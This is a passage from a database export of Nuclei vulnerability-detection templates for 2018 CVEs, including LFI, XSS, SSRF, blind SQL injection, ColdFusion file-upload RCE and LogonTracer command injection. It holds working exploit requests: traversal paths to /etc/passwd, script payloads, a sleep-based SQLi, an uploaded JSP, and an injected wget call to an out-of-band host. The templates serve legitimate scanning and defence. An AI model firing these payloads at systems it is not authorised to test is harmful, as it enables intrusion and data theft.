490a0046304402204ea28cd5779d252530f7f2854d3fec0aff9d51c4a5018f72ded4673441416d97022023e6c65fcf320c34b9df8210e07125951e511ab0661c65c758241634aa5c6b8c:922c64590222798bb761d5b6d8e72950", "hash": "0eeac231ea71921d506366d725ae71fe", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804d" }, "name": "CVE-2018-14931.yaml", "content": "id: CVE-2018-14931\n\ninfo:\n name: Polarisft Intellect Core Banking Software Version 9.7.1 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Polarisft to fix the open redirect vulnerability.\n reference:\n - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14931\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-14931\n cwe-id: CWE-601\n epss-score: 0.00118\n epss-percentile: 0.44971\n cpe: cpe:2.3:a:polarisft:intellect_core_banking:9.7.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: polarisft\n product: intellect_core_banking\n tags: cve,cve2018,redirect,polarisft,intellect\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 490a0046304402201be780a4469ea0a8738f8438126c71d69f8d31d05d6839b39986254edf0db41402207b1a3a25c0738e82ca020983b3a8445e0463f65171558f9d5011fdcafecd6853:922c64590222798bb761d5b6d8e72950", "hash": "896f17f1603b19c386c10a6d2d6314eb", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804e" }, "name": "CVE-2018-15138.yaml", "content": "id: CVE-2018-15138\n\ninfo:\n name: LG-Ericsson iPECS NMS 30M - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://cxsecurity.com/issue/WLB-2018080070\n - https://www.exploit-db.com/exploits/45167/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15138\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-15138\n cwe-id: CWE-22\n epss-score: 0.21114\n epss-percentile: 0.95976\n cpe: cpe:2.3:a:ericssonlg:ipecs_nms:30m-2.3gn:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: ericssonlg\n product: ipecs_nms\n tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data\"\n - \"{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202b0ed4bce15d30705879eea7dd0299bd568936f4c93490a2eb2cf6a120bbec9d022058e551bd65de05595c3d6a81d60313c7062d261e34d7c7466911ba50e8cb87f8:922c64590222798bb761d5b6d8e72950", "hash": "b77ed328fe624b6aca9256a514913f11", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30804f" }, "name": "CVE-2018-15517.yaml", "content": "id: CVE-2018-15517\n\ninfo:\n name: D-Link Central WifiManager - Server-Side Request Forgery\n author: gy741\n severity: high\n description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network.\n remediation: |\n Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager.\n reference:\n - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517\n - http://seclists.org/fulldisclosure/2018/Nov/28\n - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N\n cvss-score: 8.6\n cve-id: CVE-2018-15517\n cwe-id: CWE-918\n epss-score: 0.01001\n epss-percentile: 0.83284\n cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dlink\n product: central_wifimanager\n tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/\"\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4b0a00483046022100b339ad6df9268d6b897b9c6b3faae2d6ea097baf206beafbf09c0a0f1c14b0d40221009cac5ad6cdb667b20025da67357b1151ebce73e32b71995292f1d60d7a43e50e:922c64590222798bb761d5b6d8e72950", "hash": "298ac33806eb1fa57222c911f0ef86b0", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308050" }, "name": "CVE-2018-15535.yaml", "content": "id: CVE-2018-15535\n\ninfo:\n name: Responsive FileManager <9.13.4 - Local File Inclusion\n author: daffainfo\n severity: high\n description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45271\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15535\n - http://seclists.org/fulldisclosure/2018/Aug/34\n - https://www.exploit-db.com/exploits/45271/\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-15535\n cwe-id: CWE-22\n epss-score: 0.97149\n epss-percentile: 0.9976\n cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tecrail\n product: responsive_filemanager\n tags: cve,cve2018,lfi,edb,seclists,tecrail\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203c4ddbcd4e1d9a14a467c108e82ff87b32ec9351cb237830dd61e9ade6527fd0022040b2a10a4d6e4ce8557f04d663b75210e2f1e9ff391b65f66608c885c794c323:922c64590222798bb761d5b6d8e72950", "hash": "f7220e5fe4b7d6e8a04f98c94e1e211f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308051" }, "name": "CVE-2018-15745.yaml", "content": "id: CVE-2018-15745\n\ninfo:\n name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion\n author: gy741\n severity: high\n description: |\n Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Upgrade to a patched version of Argus Surveillance DVR.\n reference:\n - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt\n - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html\n - https://www.exploit-db.com/exploits/45296/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15745\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-15745\n cwe-id: CWE-22\n epss-score: 0.94576\n epss-percentile: 0.99184\n cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: argussurveillance\n product: dvr\n tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"for 16-bit app support\"\n - \"[drivers]\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100dc9985c42c6ada43064e760b5d0e9e7c91e0c13be081b6667a4578d416a3f8ac022100b49638b1fa7561d27698d6962f89f45384b44df899a37f6e01d94674e4651cd0:922c64590222798bb761d5b6d8e72950", "hash": "2b1c3b7f7f1afa6d795b057490d1dd95", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308052" }, "name": "CVE-2018-15917.yaml", "content": "id: CVE-2018-15917\n\ninfo:\n name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45338\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15917\n - https://github.com/bbalet/jorani/issues/254\n - https://github.com/JavierOlmedo/JavierOlmedo\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2018-15917\n cwe-id: CWE-79\n epss-score: 0.04217\n epss-percentile: 0.92046\n cpe: cpe:2.3:a:jorani_project:jorani:0.6.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: jorani_project\n product: jorani\n shodan-query: title:\"Login - Jorani\"\n tags: cve,cve2018,jorani,xss,jorani_project\n\nhttp:\n - raw:\n - |\n GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /session/login HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '_jorani'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022032c0d3a3e6d2ec456254c10a587dc9efa108903eec34e0f3e026c6d76ef4d65602201978070aa018f55066f9722f3e9f66834c105641573a6528eeb51a9ee6e03480:922c64590222798bb761d5b6d8e72950", "hash": "7397e0dbcb2bb1b0230e9d2d49cd78f5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308053" }, "name": "CVE-2018-15961.yaml", "content": "id: CVE-2018-15961\n\ninfo:\n name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution\n author: SkyLark-Lab,ImNightmaree\n severity: critical\n description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.\n impact: |\n Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to take control of the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Adobe to fix this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-15961\n - https://github.com/xbufu/CVE-2018-15961\n - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html\n - http://web.archive.org/web/20220309060906/http://www.securitytracker.com/id/1041621\n - http://www.securitytracker.com/id/1041621\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-15961\n cwe-id: CWE-434\n epss-score: 0.97411\n epss-percentile: 0.99921\n cpe: cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: adobe\n product: coldfusion\n shodan-query: http.component:\"Adobe ColdFusion\"\n tags: cve,cve2018,adobe,rce,coldfusion,fileupload,kev,intrusive\n\nhttp:\n - raw:\n - |\n POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n -----------------------------24464570528145\n Content-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n Content-Type: image/jpeg\n\n <%@ page import=\"java.util.*,java.io.*\"%>\n <%@ page import=\"java.security.MessageDigest\"%>\n <%\n String cve = \"CVE-2018-15961\";\n MessageDigest alg = MessageDigest.getInstance(\"MD5\");\n alg.reset();\n alg.update(cve.getBytes());\n byte[] digest = alg.digest();\n StringBuffer hashedpasswd = new StringBuffer();\n String hx;\n for (int i=0;i\n -----------------------------24464570528145\n Content-Disposition: form-data; name=\"path\"\n\n {{randstr}}.jsp\n -----------------------------24464570528145--\n - |\n GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"ddbb3e76f92e78c445c8ecb392beb225\" # MD5 of CVE-2018-15961\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022079a0f0e0bdc7376e1343de468e02f8dd25505916ea291f52a4b4672bb49f58c6022045414437bbe18a49102cd5f18a1434331c158de4796d2340acbe64d8b9f82767:922c64590222798bb761d5b6d8e72950", "hash": "1003fa4126fa25e60e4204cb1f45c1c9", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308054" }, "name": "CVE-2018-16059.yaml", "content": "id: CVE-2018-16059\n\ninfo:\n name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.\n reference:\n - https://www.exploit-db.com/exploits/45342\n - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16059\n - https://www.exploit-db.com/exploits/45342/\n - https://cert.vde.com/en-us/advisories/vde-2019-002\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16059\n cwe-id: CWE-22\n epss-score: 0.32871\n epss-percentile: 0.96924\n cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: endress\n product: wirelesshart_fieldgate_swg70_firmware\n tags: cve,cve2018,iot,lfi,edb,endress\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/fcgi-bin/wgsetcgi\"\n\n body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220796e5a1f1956c4523eb569daf5b1a0a1faebc2f72247418812931a5e68277d980220772cd55cfb046e365847adba5643a19a0e9462d49ac46b936262e094587b2f92:922c64590222798bb761d5b6d8e72950", "hash": "678b65833f73a3faa8b5da93c1d63766", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308055" }, "name": "CVE-2018-16133.yaml", "content": "id: CVE-2018-16133\n\ninfo:\n name: Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: Cybrotech CyBroHttpServer 1.0.3 is vulnerable to local file inclusion in the URI.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Cybrotech CyBroHttpServer 1.0.3.\n reference:\n - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html\n - http://www.cybrotech.com/\n - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16133\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2018-16133\n cwe-id: CWE-22\n epss-score: 0.03629\n epss-percentile: 0.91461\n cpe: cpe:2.3:a:cybrotech:cybrohttpserver:1.0.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: cybrotech\n product: cybrohttpserver\n tags: cve2018,cve,lfi,packetstorm,cybrotech\n\nhttp:\n - raw:\n - |+\n GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\n Host: {{Hostname}}\n\n unsafe: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 4b0a00483046022100bec0bd28d03a8668e238050338b250954c84ef14d63693d29d23164a96eb7940022100e7a8f25d4206e7b85164c393af308c6186954abe8b02b180e84a80b946227f50:922c64590222798bb761d5b6d8e72950", "hash": "f52a73a15a8e2b9adc06e758a00fc836", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308056" }, "name": "CVE-2018-16139.yaml", "content": "id: CVE-2018-16139\n\ninfo:\n name: BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting\n author: atomiczsec\n severity: medium\n description: |\n BIBLIOsoft BIBLIOpac 2008 contains a cross-site scripting vulnerability via the db or action parameter to bin/wxis.exe/bibliopac/, which allows a remote attacker to inject arbitrary web script or HTML.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest patch or upgrade to a newer version of BIBLIOsoft BIBLIOpac 2008 that addresses the XSS vulnerability.\n reference:\n - https://www.0x90.zone/web/xss/2019/02/01/XSS-Bibliosoft.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16139\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-16139\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.47838\n cpe: cpe:2.3:a:bibliosoft:bibliopac:2008:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bibliosoft\n product: bibliopac\n shodan-query: title:\"Bibliopac\"\n tags: cve,cve2018,xss,bibliopac,bibliosoft\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">.xrf'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022033723090a9b4a81b792ed6ecdaf230faf72fd66022ed67fae3697f90eff3b012022043a029915f1b514beac428b24c0629be457217dbe22ec11838076265cb09e9a5:922c64590222798bb761d5b6d8e72950", "hash": "33f9f36cbb5614fb213bc8389bc4ab1f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308057" }, "name": "CVE-2018-16159.yaml", "content": "id: CVE-2018-16159\n\ninfo:\n name: WordPress Gift Voucher <4.1.8 - Blind SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Gift Vouchers plugin before 4.1.8 contains a blind SQL injection vulnerability via the template_id parameter in a wp-admin/admin-ajax.php wpgv_doajax_front_template request. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: Fixed in version 4.1.8.\n reference:\n - https://wpscan.com/vulnerability/9117\n - https://wordpress.org/plugins/gift-voucher/\n - https://www.exploit-db.com/exploits/45255/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16159\n - https://wpvulndb.com/vulnerabilities/9117\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16159\n cwe-id: CWE-89\n epss-score: 0.01228\n epss-percentile: 0.85084\n cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: codemenschen\n product: gift_vouchers\n framework: wordpress\n tags: cve,cve2018,sqli,wordpress,unauth,wp,gift-voucher,edb,wpscan,wp-plugin,codemenschen\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"images\") && contains(body, \"title\")'\n condition: and\n# digest: 4a0a0047304502202b1aa5555d71a8aca48bc022946bcdce1d30c66d55e0d3674a071d4f71c612ee022100956080f91d3386d400a3993d774251f5a2649171c661633597a767552865238a:922c64590222798bb761d5b6d8e72950", "hash": "8ec496ff8263a930bd4a2e220e560d58", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308058" }, "name": "CVE-2018-16167.yaml", "content": "id: CVE-2018-16167\n\ninfo:\n name: LogonTracer <=1.2.0 - Remote Command Injection\n author: gy741\n severity: critical\n description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade LogonTracer to a version higher than 1.2.0.\n reference:\n - https://www.exploit-db.com/exploits/49918\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16167\n - https://jvn.jp/en/vu/JVNVU98026636/index.html\n - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16167\n cwe-id: CWE-78\n epss-score: 0.27457\n epss-percentile: 0.9669\n cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: jpcert\n product: logontracer\n tags: cve,cve2018,rce,oast,edb,logontracer,intrusive,jpcert\n\nhttp:\n - raw:\n - |\n POST /upload HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - http\n# digest: 490a004630440220391e666a4ba5604bb62fcd1ca7396a502fb6f43913e9cd3c14529faf765f1464022047bf7f2d790f04727bd7e93e901f9af13a8077b286023e0a843688319ccf9df5:922c64590222798bb761d5b6d8e72950", "hash": "de6551c90f93ee4338896d5d93d68386", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308059" }, "name": "CVE-2018-16283.yaml", "content": "id: CVE-2018-16283\n\ninfo:\n name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion\n author: 0x240x23elu\n severity: critical\n description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.\n remediation: |\n Update to the latest version of the WordPress Plugin Wechat Broadcast or apply the patch provided by the vendor to fix the LFI vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45438\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16283\n - https://github.com/springjk/wordpress-wechat-broadcast/issues/14\n - http://seclists.org/fulldisclosure/2018/Sep/32\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/150202\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-16283\n cwe-id: CWE-22\n epss-score: 0.0412\n epss-percentile: 0.91963\n cpe: cpe:2.3:a:wechat_brodcast_project:wechat_brodcast:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wechat_brodcast_project\n product: wechat_brodcast\n framework: wordpress\n tags: cve,cve2018,edb,seclists,wordpress,wp-plugin,lfi,wechat_brodcast_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd\"\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 490a004630440220566093a92cc8bec90dea2dd4f78b4c6393324f9ae1a6508694ae7ab1961555bd022016fd5d0fb9f8a0483755d3735220fde2bfc22fa1d4ab1e2934215495ccddd3e8:922c64590222798bb761d5b6d8e72950", "hash": "89af3627bd61f51e1c3587e4c984a6f3", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30805a" }, "name": "CVE-2018-16288.yaml", "content": "id: CVE-2018-16288\n\ninfo:\n name: LG SuperSign EZ CMS 2.5 - Local File Inclusion\n author: daffainfo\n severity: high\n description: |\n LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.\n remediation: |\n Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS.\n reference:\n - https://www.exploit-db.com/exploits/45440\n - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-16288\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2018-16288\n cwe-id: CWE-200\n epss-score: 0.12055\n epss-percentile: 0.95227\n cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: lg\n product: supersign_cms\n tags: cve,cve2018,lfi,supersign,edb,lg\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206c44f04d87cd0bb24833f17912104c4fe7f11064d15ad1ec47e91daedda230a402203c5b59f016c1ab24a2a0f0531c04b7fdab6907c1d028f7c976fef3bf42f929eb:922c64590222798bb761d5b6d8e72950", "hash": 